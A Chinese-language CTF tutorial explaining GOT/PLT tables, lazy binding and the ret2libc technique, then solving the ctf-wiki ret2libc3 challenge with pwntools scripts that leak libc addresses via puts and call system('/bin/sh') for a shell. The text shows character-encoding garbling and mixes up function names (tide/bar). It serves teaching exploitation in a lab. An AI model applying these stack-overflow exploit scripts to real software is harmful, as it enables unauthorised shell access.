之前曾在Pwn入門之基礎(chǔ)棧溢出里面曾經(jīng)提過ret2libc的相關(guān)知識，但是寫的比較籠統(tǒng)，感覺對新手還是不夠友好，想通過本文對ret2libc的原理和利用進(jìn)行詳細(xì)講解。

　　前置知識

　　GOT表和PLT表

　　got表也叫全局偏移表（Global Offset Table）是Linux ELF文件中用于定位全局變量和函數(shù)的一個(gè)表。

　　plt表也叫過程鏈接表（Procedure Linkage Table）是Linux ELF文件中用于延遲綁定的表惡，即函數(shù)第一次被調(diào)用的時(shí)候才進(jìn)行綁定。

　　在程序運(yùn)行過程中，plt表和got表的運(yùn)行過程大致如下：

　　用一句話來總結(jié)就是，可執(zhí)行文件里保存的是plt表的地址，對應(yīng)plt地址指向的是got的地址，got表指向的是glibc中的地址

　　在這里如果需要通過plt表獲取函數(shù)的地址，需要保證got表已經(jīng)獲取了正確的地址，但如果一開始對所有函數(shù)都進(jìn)行了重定位是比較麻煩且浪費(fèi)資源，為此，Linux引入了延遲綁定機(jī)制。

　　延遲綁定

　　這種機(jī)制存在的目的是glibc為了節(jié)約系統(tǒng)資源，提高性能。其詳細(xì)過程如下

　　源程序在第一次調(diào)用一個(gè)函數(shù)時(shí)，首先去

　　如果存在一個(gè)tide函數(shù)，這個(gè)函數(shù)在plt中的條目為tide@plt，在got中的條目為tide@got，那么在第一次調(diào)用bar函數(shù)時(shí)，首先會跳轉(zhuǎn)到plt，偽代碼如下：

　　tide@plt; jmp tide@got patch tide@got

　　這里會從PLT跳到GOT，如果函數(shù)從來沒有調(diào)用過，那這時(shí)GOT會跳轉(zhuǎn)回PLT并調(diào)用patch tide@got，這行代碼的作用是將bar函數(shù)真正的地址填充到tide@got，然后跳轉(zhuǎn)到bar函數(shù)真正的地址執(zhí)行代碼。當(dāng)下次再次調(diào)用bar函數(shù)的時(shí)候，執(zhí)行路徑就是先跳轉(zhuǎn)到tide@plt、tide@got、tide真正的地址。

　　簡而言之就是，當(dāng)一個(gè)函數(shù)被調(diào)用過后，got表里保存了他在內(nèi)存中的地址，可以通過泄漏got表內(nèi)存來泄漏函數(shù)地址，然后可以根據(jù)起泄漏的函數(shù)地址獲得其libc版本，從而計(jì)算其他函數(shù)在內(nèi)存空間中的地址。因?yàn)閘ibc中任意兩個(gè)函數(shù)之間的偏移是固定的。

　　以計(jì)算system函數(shù)在內(nèi)存空間中的函數(shù)地址舉例。

　　1. 獲取__libc_start_main函數(shù)在內(nèi)存空間中的地址addr_main

　　2. __libc_start_main函數(shù)相對于libc.so.6的起始地址是addr_main_offset

　　3. system函數(shù)相對于libc.so.6的起始地址是addr_system_offset

　　4. 則system函數(shù)在內(nèi)存中真正的地址為addr_main+addr_system_offset-addr_main_offset

　　在我們r(jià)et2libc中我們只需要理解為，只有執(zhí)行過的函數(shù)，我們才能通過got表泄漏其地址。

　　基本思路

　　ret2libc是控制函數(shù)執(zhí)行l(wèi)ibc中的函數(shù)，通常是返回至某個(gè)函數(shù)的plt處。一般情況下，會選擇執(zhí)行system（‘/bin/sh’），因此需要找到system函數(shù)的地址 看到這里相信有的師傅就會問了，為什么不能直接跳到got表，通過前面的前置知識我們知道plt表中的地址對應(yīng)的是指令，got表中的地址對應(yīng)的是指令地址，而返回地址必須保存一段有效的匯編指令，所以必須要用plt表 ret2libc通?？梢苑譃橄旅鎺追N類型：

　　? 程序中自身包含system函數(shù)和“/bin/sh”字符串

　　? 程序中自身就有system函數(shù)，但是沒有“/bin/sh”字符串

　　? 程序中自身沒有syetem函數(shù)和“/bin/sh”字符串，但給出了libc.so文件

　　? 程序中自身沒有sysetm函數(shù)和“/bin/sh”字符串，并且沒有給出libc.so文件

　　針對前面那三種在前面的文章中已經(jīng)進(jìn)行過詳細(xì)講解，本文主要是針對第四種情況進(jìn)行講解 對于沒有給出libc.so文件的程序，我們可以通過泄漏出程序當(dāng)中的某個(gè)函數(shù)的地址，通過查詢來找出其中使用lib.so版本是哪一個(gè)，然后根據(jù)lib.so的版本去找到我們需要的system函數(shù)的地址。 針對常見的題目我們的解題思路是這樣的：

　　1. 利用棧溢出及puts函數(shù)泄漏出在got表中__libc_start_main函數(shù)的地址

　　2. puts函數(shù)的返回地址為_start函數(shù)

　　3. 利用最低的12位找出libc版本（即使程序有ASLR保護(hù)，也只是針對地址中間位進(jìn)行隨機(jī)，最低的12位并不會發(fā)生改變）

　　4. 利用找到的libc版本計(jì)算system函數(shù)和/bin/sh字符串在內(nèi)存中的正確的地址

　　實(shí)戰(zhàn)

　　我們還是利用ctfwiki中的ret2libc3進(jìn)行講解 分析程序

　　根據(jù)前面分析的，我們需要找到如下幾個(gè)地址

　　? __libc_start_main函數(shù)在got表的地址

　　? _start函數(shù)的地址

　　? puts函數(shù)在plt表中的地址

　　__libc_start_main函數(shù)在got表中的地址

　　_start函數(shù)的地址

　　puts函數(shù)在plt表中的地址

　　獲取到這三個(gè)地址后，我們可以采用調(diào)用puts函數(shù)后，ret到main函數(shù)，用main函數(shù)里面的gets來獲取libc_start的地址

　　獲取libc_start地址的腳本如下

　　from pwn import * sh = process（‘。/ret2libc3’） puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 payload = 112 * b‘a(chǎn)’ + p32（puts_plt） + p32（addr_start） + p32（got_libc_start） sh.recv（） sh.sendline（payload） puts_addr = u32（sh.recv（4）） success（“__libc_start_addr is：” + hex（puts_addr）） sh.recv（）

　　即使程序有ASLR保護(hù)，也只是針對地址中間位進(jìn)行隨機(jī)，最低的12位并不會發(fā)生改變，在16進(jìn)制中也就是我們的最后3位，因此cd0是不會變，使用libc database search（https://libc.blukat.me/）進(jìn)行查詢（網(wǎng)上普遍推薦的是利用LibcSearcher，但是我用LibcSearcher一直沒打通）

　　看到這么多l(xiāng)ibc版本挨個(gè)試可能會累死，于是再來泄漏個(gè)puts的地址

　　from pwn import * sh = process（‘。/ret2libc3’） puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 got_puts = 0x804a018 # 獲取__libc_start的地址 payload1 = 112 * b‘a(chǎn)’ + p32（puts_plt） + p32（addr_start） + p32（got_libc_start） sh.recv（） sh.sendline（payload1） libc_start_addr = u32（sh.recv（4）） success（“__libc_start_addr is：” + hex（libc_start_addr）） # 獲取puts的地址 payload2 = 112 * b‘a(chǎn)’ + p32（puts_plt） + p32（addr_start） + p32（got_puts） sh.recv（） sh.sendline（payload2） puts_addr = u32（sh.recv（4）） success（“puts_addr is：” + hex（puts_addr））

　　還剩下三個(gè)了，使用下面的腳本挨個(gè)嘗試吧

　　from pwn import * sh = process（‘。/ret2libc3’） puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 got_puts = 0x804a018 # 獲取__libc_start的地址 payload1 = 112 * b‘a(chǎn)’ + p32（puts_plt） + p32（addr_start） + p32（got_libc_start） sh.recv（） sh.sendline（payload1） libc_start_addr = u32（sh.recv（4）） success（“__libc_start_addr is：” + hex（libc_start_addr）） # 獲取puts的地址 payload2 = 112 * b‘a(chǎn)’ + p32（puts_plt） + p32（addr_start） + p32（got_puts） sh.recv（） sh.sendline（payload2） puts_addr = u32（sh.recv（4）） success（“puts_addr is：” + hex（puts_addr）） sh.recv（） libc_start = #通過libc database search獲取 libc_system = #通過libc database search獲取 libc_binsh = #通過libc database search獲取 libcbase = libc_start_addr - libc_start system_addr = libcbase + libc_system binsh_addr = libcbase + libc_binsh payload = 112 * b‘a(chǎn)’ + p32（system_addr） + 4 * b‘a(chǎn)’ + p32（binsh_addr） sh.sendline（payload） sh.interactive（）

　　最終經(jīng)過多次實(shí)驗(yàn)可知，libc文件是libc6_2.31-0ubuntu9_i386 最終的完整腳本如下

　　from pwn import * sh = process（‘。/ret2libc3’） puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 got_puts = 0x804a018 # 獲取__libc_start的地址 payload1 = 112 * b‘a(chǎn)’ + p32（puts_plt） + p32（addr_start） + p32（got_libc_start） sh.recv（） sh.sendline（payload1） libc_start_addr = u32（sh.recv（4）） success（“__libc_start_addr is：” + hex（libc_start_addr）） # 獲取puts的地址 payload2 = 112 * b‘a(chǎn)’ + p32（puts_plt） + p32（addr_start） + p32（got_puts） sh.recv（） sh.sendline（payload2） puts_addr = u32（sh.recv（4）） success（“puts_addr is：” + hex（puts_addr）） sh.recv（） libc_start = 0x01edf0 libc_system = 0x045830 libc_binsh = 0x192352 libcbase = libc_start_addr - libc_start system_addr = libcbase + libc_system binsh_addr = libcbase + libc_binsh payload = 112 * b‘a(chǎn)’ + p32（system_addr） + 4 * b‘a(chǎn)’ + p32（binsh_addr） sh.sendline（payload） sh.interactive（） 成功打通

　　總結(jié)

　　ret2libc這種題型，相較于前面簡單的題目，對Linux中程序運(yùn)行的理解要求更高，一開始根據(jù)網(wǎng)上的教程去尋找libc版本的時(shí)候發(fā)現(xiàn)大多數(shù)教程都是使用腳本去獲取，但在自己嘗試的時(shí)候就一直打不通，于是便放棄了腳本采用手工的方式進(jìn)行查找，可能相較于通過腳本直接獲取更加費(fèi)時(shí)費(fèi)力，但是也通過這個(gè)倒逼自己將got表和plt表的相關(guān)知識徹底理解透徹，也捋清楚了程序在Linux中到底是如何運(yùn)行的。

　　編輯：黃飛